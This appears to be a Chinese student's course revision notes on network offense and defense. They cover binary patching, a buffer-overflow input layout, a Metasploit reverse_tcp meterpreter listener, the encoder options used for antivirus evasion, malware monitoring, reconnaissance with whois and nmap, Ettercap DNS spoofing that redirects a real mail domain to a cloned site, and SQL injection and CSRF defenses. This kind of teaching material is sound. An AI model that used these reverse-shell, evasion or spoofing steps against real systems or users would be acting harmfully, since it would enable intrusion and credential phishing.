11111

一．逆向bof 按ESC键

:%!xxd         将显示模式切换为16进制模式

/e8d7         查找要修改的内容，/后面是要查找的内容

ESC+I键       可在文档中插入语句（insert）

ESC+R键      字母替换

:%!xxd -r       转换16进制为原格式

:wq            存盘退出vi

l  gdb调试程序

gdb 可执行文件名            进入调试

r                            run，执行程序

info r                        显示执行信息

确定溢出攻击输入值的构造方法  32bits+<getshell>函数地址

二．后门 –p指端口 –l 指监听  与cmd.exe绑定-e

设置payload：set payload windows/meterpreter/reverse_tcp

设置监听IP：set LHOST 192.168.20.136

设置监听端口：192.168.20.136

查看设置信息情况：show options

开始后门监听：exploit

三．免杀 特征码：类似于人的生物特征，恶意代码可能会包含一段或多端数据能代表其特征。杀软一般会对文件内容进行静态扫描，将文件内容与特征库进行匹配，来检测已知的网络攻击。

基于行为：基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

免杀效果评价：VirusTotal、Virscan，在线监测工具。以不做免杀的后门作为最差标杆

-e编码器 -i叠代 –b不能包含的字符 –f 生成文件类型

四．恶意代码 Windows计划任务schtasks每5分钟记录一下有哪些程序在连接网络Sysmon是微软Sysinternals套件中的一个工具。可以监控几乎所有的重要操作。

动态分析：1.用SysTracer进行动态分析，对不同时态的电脑状况进行拍照，然后进行比对看看是否有可疑行为。

分析该软件在(1)启动回连，(2)安装到目标机(3)及其他任意操作时（如进程迁移或抓屏，重要是你感兴趣）。该后门软件（3）读取、添加、删除了哪些注册表项

（4）读取、添加、删除了哪些文件（5）连接了哪些外部IP，传输了什么数据（wireshark抓包分析）

五．信息搜集和漏洞扫描 DNS IP注册信息的查询

基本的扫描技术：主机发现、端口扫描、OS及服务版本探测、具体服务的查点

漏洞扫描：会扫，会看报告，会查漏洞说明，会修补漏洞

1. Whois查询

        使用方法：whois +域名

Domain Name就是域名 ROID是注册机构ID  Domain Status是指域名状态    Registrant ID是登记者ID    Registrant是登记者  Registrant Contact Email是登记者邮箱  Sponsoring Registrar是代理商   Name Server名称服务器甲    Name Server名称服务器乙        Registration Time注册时间     Expiration Time过期时间    DNSSEC是DNS安全扩展  

2.nslookup主要用来诊断域名系统 (DNS) 基础结构的信息

使用方法：nslookup +域名IP2Location地理位置 网页在线查询地理位置，很方便

3.Netcraft查询   在线查询dns信息，可以查看web服务器操作系统版本

4.IP反域名查询   输入ip查出各种信息

5.搜索引擎搜索  Google Hacking 可以对目标组织和个人意外泄露的web信息进行挖掘。

l  网络扫描

    Nmap包含四项基本功能：

主机发现（Host Discovery）端口扫描（Port Scanning）版本侦测（Version Detection）操作系统侦测（Operating System Detection）

例子要求：获取http://nmap.org 的主机是否开启

输入命令：nmap -F -sT -v nmap.org

/*-F：扫描100个最有可能开放的端口   -v 获取扫描的信息   -sT：采用的是TCP

例子要求：查找45.33.49.119-120（45.33.49.119:nmap.org的IP地址）的主机的状态以及端口状态

输入命令：nmap -F -sT -v -n 45.33.49.119-120

六．MSF  Msfconsole常用指令

?   帮助菜单

back 从当前环境返回

banner   显示一个MSF banner

cd   切换目录

color   颜色转换

connect   连接一个主机

exit   退出MSF

help   帮助菜单

info   显示一个或多个模块的信息

irb   进入irb脚本模式

jobs   显示和管理作业

kill   杀死一个作业

load   加载一个插件

loadpath 在一个路径搜索并加载模块

quit   退出MSF

resource 运行存储在一个文件中的命令

route   查看一个会话的路由信息

save   保存动作

search   搜索模块名和描述

set   给一个变量赋值

setg   把一个值赋给全局变量

show   显示所给类型的模块，或所有模块

sleep   在限定的秒数内什么也不做

unload   卸载一个模块

unset   解除一个或多个变量

unsetg   解除一个或多个全局变量

use   通过名称选择一个模块

version   显示MSF和控制台库版本号

七．网络欺诈  1.Ettercap DNS欺骗

将kali网卡改为混杂模式：ifconfig eth0 promisc

对ettercap的dns文件进行编辑。输入命令vi /etc/ettercap/etter.dns，添加两条指令：

mail.10086.cn(欺骗的域名) A 192.168.163.135

*.mail.10086.cn(欺骗的域名) A 192.168.163.135

kali进入ettercap（ettercap -G），点击sniff选项卡的unified sniffing选项

蹦出个窗口，点击ok

查看存活主机列表，看到我的windows主机IP并将其加入目标1，将网关IP加入目标2

选择dns_spoof插件

选择start sniffing

在windows浏览器地址栏输入：mail.10086.cn(欺骗的域名) 成功跳转我们的克隆网站

两者结合成功。

八．Web基础无

九．Web安全

l  SQL注入

原理：做填空题

所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

预防方法

1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和

双"-"进行转换等。

2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。

3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。

4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。

5.应用的异常信息应该给出尽可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装

CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性